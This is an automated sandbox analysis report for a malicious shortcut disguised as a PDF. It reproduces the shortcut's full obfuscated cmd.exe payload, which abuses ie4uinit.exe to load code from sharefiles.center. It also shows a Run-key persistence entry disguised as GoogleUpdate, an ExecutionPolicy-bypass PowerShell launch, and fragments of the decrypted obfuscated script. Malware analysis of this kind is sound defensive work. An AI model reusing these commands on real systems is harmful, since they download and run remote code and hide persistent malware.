Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 21, 2024, 2:24 p.m.	Aug. 21, 2024, 2:26 p.m.

Size	2.1KB
Type	MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hide
MD5	`589440925b53b50ff9f6518c1b532320`
SHA256	`390b00884574d2e555b474ea392d9bd25be8fe22ddd4ff5a4dd30175c961539b`
CRC32	`08EC1046`
ssdeep	`48:8udJtO2MrbVc/4yW91lUxgbFpGeliO6zhsAJXuz:8CtOV/IxgxjkFhDZuz`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MLAvHukP" C:\Users\test22\AppData\Local\Temp\file.pdf.lnk
3016
- cmd.exe "C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!""
  1784
  - WMIC.exe wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings"
    2320
explorer.exe C:\Windows\Explorer.EXE
1236
ie4uinit.exe C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings
2524
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC
  1720
  - cmd.exe "C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
    2688
    - wscript.exe wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
      2984
      - cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC
        1780
        
        powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC
        2352
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f
  1968
  - cmd.exe "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
    2792
    - reg.exe reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
      3032
- ie4uinit.exe C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -ClearIconCache
  2544

Name	Response	Post-Analysis Lookup
sharefiles.center	A 104.21.92.14 A 172.67.184.129	104.21.92.14

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.184.129	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49170 -> 172.67.184.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49170 172.67.184.129:443	C=US, O=Google Trust Services, CN=WE1	CN=sharefiles.center	e2:b2:31:0e:2e:bc:db:7e:f3:a3:be:d5:95:0a:42:25:d4:79:01:4e

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 21, 2024, 2:24 p.m.			0	0
IsDebuggerPresent Aug. 21, 2024, 2:24 p.m.			0	0

Command line console output was observed (50 out of 85 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 21, 2024, 2:24 p.m.	buffer: Executing (Win32_Process)->Create() console_handle: 0x00000007	1	1
WriteConsoleA Aug. 21, 2024, 2:24 p.m.	buffer: Method execution successful. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 21, 2024, 2:24 p.m.	buffer: Out Parameters: console_handle: 0x00000007	1	1
WriteConsoleA Aug. 21, 2024, 2:24 p.m.	buffer: instance of __PARAMETERS { ProcessId = 2524; ReturnValue = 0; }; console_handle: 0x00000007	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: The decrypted script is: console_handle: 0x00000013	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $processName = "cscript" console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $process = Get-Process -Name $processName -ErrorAction SilentlyContinue console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: if ($process) { console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: Write-Output "already process running" console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: exit console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $userProfilePath = $env:USERPROFILE console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $nowFolderPath = Join-Path -Path $userProfilePath -ChildPath 'AppData\L console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: ocal\Microsoft' console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $outputFile = Join-Path -Path $nowFolderPath -ChildPath 'hello.js' console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $chunkFiles = Get-ChildItem -Path $nowFolderPath -Filter 'text*' console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $mergedContent = "" console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: foreach ($file in $chunkFiles) { console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $fileContent = Get-Content -Path $file.FullName -Raw console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $fileContent = $fileContent.TrimEnd([Environment]::NewLine.ToCharAr console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: ray()) console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $mergedContent += $fileContent console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $mergedContent = $mergedContent -replace "`r`n", "" -replace "`n", "" - console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: replace "\s+", "" console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: $jsTemplate = @" console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: (function(_0x4742c1,_0x215615){var _0x51cb45=_0x25bd,_0x4188ed=_0x4742c1();whil console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: e(!![]){try{var _0x5bc891=-parseInt(_0x51cb45(0x96))/0x1*(parseInt(_0x51cb45(0x console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: 92))/0x2)+-parseInt(_0x51cb45(0x9c))/0x3*(parseInt(_0x51cb45(0x95))/0x4)+parseI console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: nt(_0x51cb45(0xa0))/0x5*(parseInt(_0x51cb45(0x93))/0x6)+-parseInt(_0x51cb45(0x9 console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: 1))/0x7+parseInt(_0x51cb45(0x94))/0x8*(-parseInt(_0x51cb45(0x9b))/0x9)+parseInt console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: (_0x51cb45(0x98))/0xa+parseInt(_0x51cb45(0x9d))/0xb;if(_0x5bc891===_0x215615)br console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: eak;else _0x4188ed["push"](_0x4188ed["shift"]());}catch(_0x2a2995){_0x4188ed["p console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: ush"](_0x4188ed["shift"]());}}}(_0x11e5,0x1e26b));function _0x25bd(_0x32dc24,_0 console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: x29049b){var _0x11e5aa=_0x11e5();return _0x25bd=function(_0x25bda8,_0x338a08){_ console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: 0x25bda8=_0x25bda8-0x91;var _0x2cda6f=_0x11e5aa[_0x25bda8];return _0x2cda6f;},_ console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: 0x25bd(_0x32dc24,_0x29049b);}function xor(_0xd6a7c2,_0x546c3a){var _0x522088=_0 console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: x25bd,_0x10294b=base64Decode(_0xd6a7c2);_0x546c3a=repeatKey(_0x546c3a,_0x10294b console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: ["length"]);var _0x254e75="";for(var _0x534da4=0x0;_0x534da4<_0x10294b[_0x52208 console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: 8(0x97)];_0x534da4++){_0x254e75+=String[_0x522088(0x9a)](_0x10294b[_0x522088(0x console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: 9e)](_0x534da4)^_0x546c3a[_0x522088(0x9e)](_0x534da4));}return _0x254e75;}funct console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: ion base64Decode(_0x2df751){var _0x33161b=_0x25bd,_0x5afb53="ABCDEFGHIJKLMNOPQR console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: STUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_0x467a16="",_0x127cff=0x0,_0x6 console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: c6245=0x0;for(var _0x26b708=0x0;_0x26b708<_0x2df751[_0x33161b(0x97)];_0x26b708+ console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: +){if(_0x2df751[_0x33161b(0x9f)](_0x26b708)==="=")break;var _0xf8215=_0x5afb53[ console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: _0x33161b(0x99)](_0x2df751[_0x33161b(0x9f)](_0x26b708));if(_0xf8215===-0x1)cont console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: inue;_0x127cff=_0x127cff<<0x6\|_0xf8215,_0x6c6245+=0x6,_0x6c6245>=0x8&&(_0x6c624 console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: 5-=0x8,_0x467a16+=String["fromCharCode"](_0x127cff>>_0x6c6245&0xff));}return _0 console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: x467a16;}function _0x11e5(){var _0x551261=["2cFhXoM","440442yuRfBk","3664Luldfs console_handle: 0x00000017	1	1
WriteConsoleW Aug. 21, 2024, 2:24 p.m.	buffer: ","4EKxlpu","158683kCItNx","length","2216600jDhGHA","indexOf","fromCharCode","5 console_handle: 0x00000017	1	1

Uses Windows APIs to generate a cryptographic key (49 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e32e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e3020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e3020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e3020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e2de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e30e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e27e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	c:\program files (x86)\Google\Chrome\application\chrome.exe
file	c:\program files\mozilla firefox\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 21, 2024, 2:24 p.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 21, 2024, 2:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75ae4387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x750aef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x750a6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x750a6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x750a6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x750c5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x751406b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75bbd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75bbd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75bbddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75ad8a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75ad8938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75ad950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75bbdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75bbdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75bbe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75ad9367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75ad9326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75736d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x757377c4 DispatchMessageW+0xf 